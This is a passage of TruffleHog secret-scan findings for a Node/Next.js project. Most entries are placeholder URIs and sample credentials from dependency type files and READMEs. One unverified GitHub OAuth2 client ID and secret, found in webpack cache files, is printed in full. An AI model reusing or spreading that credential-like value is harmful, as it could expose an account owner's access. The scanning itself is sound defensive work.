|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: 52813b1d8ad9af510d85
|
|
RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/github/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7029ffbb2c18937d
|
|
ruleId: GitHubOauth2
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz
|
|
startLine: 0
|
|
message: 52813b1d8ad9af510d85
|
|
title: GitHubOauth2 secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz
|
|
line: 6254
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 924
|
|
DetectorName: GitHubOauth2
|
|
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
|
|
applications to access GitHub's API on behalf of a user or organization. These
|
|
credentials include a client ID and client secret, which can be used to obtain
|
|
access tokens for accessing GitHub resources.
|
|
DecoderName: BASE64
|
|
Verified: false
|
|
VerificationFromCache: true
|
|
Raw: 52813b1d8ad9af510d85
|
|
RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/github/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 992176a363e3d8a9
|
|
ruleId: GitHubOauth2
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/apps/dashboard/.next/cache/webpack/server-production/0.pack
|
|
startLine: 0
|
|
message: 52813b1d8ad9af510d85
|
|
title: GitHubOauth2 secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/apps/dashboard/.next/cache/webpack/server-production/0.pack
|
|
line: 245909
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 924
|
|
DetectorName: GitHubOauth2
|
|
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
|
|
applications to access GitHub's API on behalf of a user or organization. These
|
|
credentials include a client ID and client secret, which can be used to obtain
|
|
access tokens for accessing GitHub resources.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: true
|
|
Raw: 52813b1d8ad9af510d85
|
|
RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/github/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c1bd932c91cd4cda
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/@types/node/http.d.ts
|
|
startLine: 0
|
|
message: http://abc:xyz@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/@types/node/http.d.ts
|
|
line: 1790
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: http://abc:xyz@example.com
|
|
RawV2: http://abc:xyz@example.com
|
|
Redacted: http://abc:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 65c35953dedc7b57
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/@types/node/https.d.ts
|
|
startLine: 0
|
|
message: https://abc:xyz@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/@types/node/https.d.ts
|
|
line: 428
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: https://abc:xyz@example.com
|
|
RawV2: https://abc:xyz@example.com
|
|
Redacted: https://abc:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f081eac965f118df
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/@types/node/url.d.ts
|
|
startLine: 0
|
|
message: https://123:xyz@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/@types/node/url.d.ts
|
|
line: 722
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: https://123:xyz@example.com
|
|
RawV2: https://123:xyz@example.com
|
|
Redacted: https://123:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a18230c14354e278
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/@types/node/url.d.ts
|
|
startLine: 0
|
|
message: https://abc:xyz@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/@types/node/url.d.ts
|
|
line: 716
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: https://abc:xyz@example.com
|
|
RawV2: https://abc:xyz@example.com
|
|
Redacted: https://abc:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f03f52d67f2ae961
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/@types/node/url.d.ts
|
|
startLine: 0
|
|
message: https://abc:123@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/@types/node/url.d.ts
|
|
line: 557
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: https://abc:123@example.com
|
|
RawV2: https://abc:123@example.com
|
|
Redacted: https://abc:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 71285c8155080cef
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/faye-websocket/README.md
|
|
startLine: 0
|
|
message: http://username:password@proxy.example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/faye-websocket/README.md
|
|
line: 122
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup proxy.example.com on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: false
|
|
Raw: http://username:password@proxy.example.com
|
|
RawV2: http://username:password@proxy.example.com
|
|
Redacted: http://username:********@proxy.example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: cf9d5ac0f2fa1e76
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts
|
|
startLine: 0
|
|
message: https://abc:xyz@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts
|
|
line: 429
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: true
|
|
Raw: https://abc:xyz@example.com
|
|
RawV2: https://abc:xyz@example.com
|
|
Redacted: https://abc:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 40e557d25e059317
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts
|
|
startLine: 0
|
|
message: http://abc:xyz@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts
|
|
line: 1817
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: true
|
|
Raw: http://abc:xyz@example.com
|
|
RawV2: http://abc:xyz@example.com
|
|
Redacted: http://abc:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 919e333a335f73d4
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
|
|
startLine: 0
|
|
message: https://abc:xyz@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
|
|
line: 736
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: ESCAPED_UNICODE
|
|
Verified: false
|
|
VerificationFromCache: true
|
|
Raw: https://abc:xyz@example.com
|
|
RawV2: https://abc:xyz@example.com
|
|
Redacted: https://abc:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: aa9f19a78a21fb70
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
|
|
startLine: 0
|
|
message: https://123:xyz@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
|
|
line: 742
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: true
|
|
Raw: https://123:xyz@example.com
|
|
RawV2: https://123:xyz@example.com
|
|
Redacted: https://123:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6d8ae777484be698
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
|
|
startLine: 0
|
|
message: https://abc:123@example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts
|
|
line: 577
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: true
|
|
Raw: https://abc:123@example.com
|
|
RawV2: https://abc:123@example.com
|
|
Redacted: https://abc:********@example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 170043ac8ee06ba6
|
|
ruleId: GCP
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/google-auth-library/README.md
|
|
startLine: 0
|
|
message: your-client-email
|
|
title: GCP secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/google-auth-library/README.md
|
|
line: 323
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 6
|
|
DetectorName: GCP
|
|
DetectorDescription: GCP (Google Cloud Platform) is a suite of cloud computing
|
|
services that runs on the same infrastructure that Google uses internally for
|
|
its end-user products. GCP keys can be used to access and manage these services.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'private key should be a PEM or plain PKCS1 or PKCS8; parse
|
|
error: asn1: structure error: tags don''t match (16 vs {class:1 tag:25 length:111
|
|
isCompound:true}) {optional:false explicit:false application:false private:false
|
|
defaultValue:<nil> tag:<nil> stringType:0 timeType:0 set:false omitEmpty:false}
|
|
pkcs1PrivateKey @2'
|
|
VerificationFromCache: false
|
|
Raw: your-client-email
|
|
RawV2: '{"type":"service_account","project_id":"your-project-id","private_key_id":"your-private-key-id","private_key":"your-private-key","client_email":"your-client-email","client_id":"your-client-id","auth_uri":"https://accounts.google.com/o/oauth2/auth","token_uri":"https://accounts.google.com/o/oauth2/token","auth_provider_x509_cert_url":"https://www.googleapis.com/oauth2/v1/certs","client_x509_cert_url":"your-cert-url"}'
|
|
Redacted: your-client-email
|
|
ExtraData:
|
|
private_key_id: your-private-key-id
|
|
project: your-project-id
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/gcp/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
